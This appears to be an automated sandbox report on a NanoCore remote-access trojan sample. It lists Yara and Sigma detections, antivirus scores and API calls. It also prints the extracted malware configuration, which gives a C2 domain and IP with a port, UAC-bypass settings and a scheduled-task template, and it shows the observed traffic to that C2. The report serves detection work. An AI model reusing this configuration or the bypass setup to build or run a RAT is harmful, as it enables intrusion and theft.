8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
Click to see the 65 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 6240, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp, ParentImage: C:\Users\user\33920049\mmuiqlcvwo.pif, ParentProcessId: 5828, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, ProcessId: 6240

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp, ParentImage: C:\Users\user\33920049\mmuiqlcvwo.pif, ParentProcessId: 5828, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, ProcessId: 6240

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6290000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4834d2d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6290000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6294629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4830704.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTR

Found malware configuration

Show sources

Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "c213d282-998c-4a04-8f80-944681ca", "Group": "nano stub", "Domain1": "ezeani.duckdns.org", "Domain2": "194.5.98.48", "Port": 8338, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for submitted file

Show sources

Source: YdACOWCggQ.exe

Virustotal: Detection: 35%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Virustotal: Detection: 26%			Perma Link
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	ReversingLabs: Detection: 32%

Source: 14.2.RegSvcs.exe.6290000.8.unpack	Avira: Label: TR/NanoCore.fadte
Source: 14.2.RegSvcs.exe.1300000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: YdACOWCggQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: YdACOWCggQ.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YdACOWCggQ.exe
Source:	Binary string: \??\C:\Users\user~1\AppData\Local\Temp\RegSvcs.pdb.0 source: RegSvcs.exe, 0000000E.00000003.312234271.0000000001AF7000.00000004.00000001.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000002.774203048.0000000000E82000.00000002.00020000.sdmp, RegSvcs.exe, 00000011.00000000.313037318.0000000000BE2000.00000002.00020000.sdmp, RegSvcs.exe.8.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe.8.dr
Source:	Binary string: C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.312234271.0000000001AF7000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_0019A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0019A2DF
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_001AAFB9
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001B9FD3 FindFirstFileExA,	0_2_001B9FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0086399B GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0086399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	8_2_0087BCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00882408 FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_00882408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0087280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008A8877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	8_2_008A8877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0088CAE7 FindFirstFileW,FindNextFileW,FindClose,	8_2_0088CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00861A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00861A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0088DE7C FindFirstFileW,FindClose,	8_2_0088DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0087BF17

Networking:

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: ezeani.duckdns.org

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: ezeani.duckdns.org
Source: Malware configuration extractor	URLs: 194.5.98.48

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Source: Joe Sandbox View

IP Address: 194.5.98.48 194.5.98.48

Source: global traffic

TCP traffic: 192.168.2.7:49750 -> 194.5.98.48:8338

Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://www.globalsign.net/repository/0
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://www.globalsign.net/repository/03
Source: mmuiqlcvwo.pif.0.dr	String found in binary or memory: http://www.globalsign.net/repository09

Source: unknown

DNS traffic detected: queries for: ezeani.duckdns.org

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_00872285 InternetQueryDataAvailable,InternetReadFile,

8_2_00872285

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_008742E1 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,PostMessageW,

8_2_008742E1

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0088A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

8_2_0088A0FC

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0089D8E9 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

8_2_0089D8E9

Source: RegSvcs.exe, 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_008AC7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

8_2_008AC7D6

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6290000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4834d2d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6290000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6294629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4830704.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RegSvcs.exe.6290000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.RegSvcs.exe.4834d2d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.RegSvcs.exe.6290000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RegSvcs.exe.6294629.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RegSvcs.exe.60f0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RegSvcs.exe.3834f58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RegSvcs.exe.4830704.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
